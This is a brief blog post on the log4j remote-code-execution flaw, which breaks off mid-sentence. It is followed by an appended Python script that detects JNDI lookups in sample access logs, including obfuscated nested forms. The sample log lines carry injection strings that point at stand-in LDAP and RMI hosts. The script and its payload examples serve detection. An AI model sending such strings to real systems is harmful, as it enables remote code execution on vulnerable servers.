Why are we still surprised that open source…
log4j

Fastly has a good explanation of the log4j vulnerability that allowed easy remote code execution by attackers. Lots of hugs to all the engineers who were on-call this week. In a nutshell, if you somehow log a specific type of URL, the library would look up that URL and dynamically load whatever code the remote end sent back. It's a pretty crazy exploit; it's very weird to me that a logging library is ever looking up URLs. That just seems like the
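As an added example (not from the post or from Fastly's write-up): the "specific type of URL" is a Log4j lookup of the form `${jndi:<scheme>://...}` appearing in logged text, which is general knowledge rather than something the post spells out. The Python below scans constructed sample access-log lines for that marker from a detection standpoint, first collapsing nested lookups such as `${lower:j}` that otherwise hide it; the log lines, hosts and helper names are all assumptions.

```python
import re

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:rmi://example.invalid/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.1 - - [10/Dec/2021:12:00:04 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "${date:yyyy}"',
]

# A lookup nested directly inside another lookup: ${<prefix>${<name>:<arg>}...
# Collapsing it to ${<prefix><arg>... turns ${${lower:j}ndi:...} into ${jndi:...}.
_NESTED = re.compile(r"\$\{([^${}]*)\$\{[^${}]*?:([^${}]*)\}")

# The marker we actually care about: a JNDI lookup naming a remote scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://", re.IGNORECASE)


def flatten_lookups(text):
    """Repeatedly collapse nested lookups until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _NESTED.sub(lambda m: "${" + m.group(1) + m.group(2), text)
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, normalized_line) for each line carrying a JNDI lookup.

    Plain substitutions such as ${date:yyyy} are not reported; only lookups that
    would make the logger reach out to a remote URL are.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = flatten_lookups(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append((number, match.group(1).lower(), normalized))
    return hits


if __name__ == "__main__":
    for number, scheme, line in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup over {scheme} -> {line}")
```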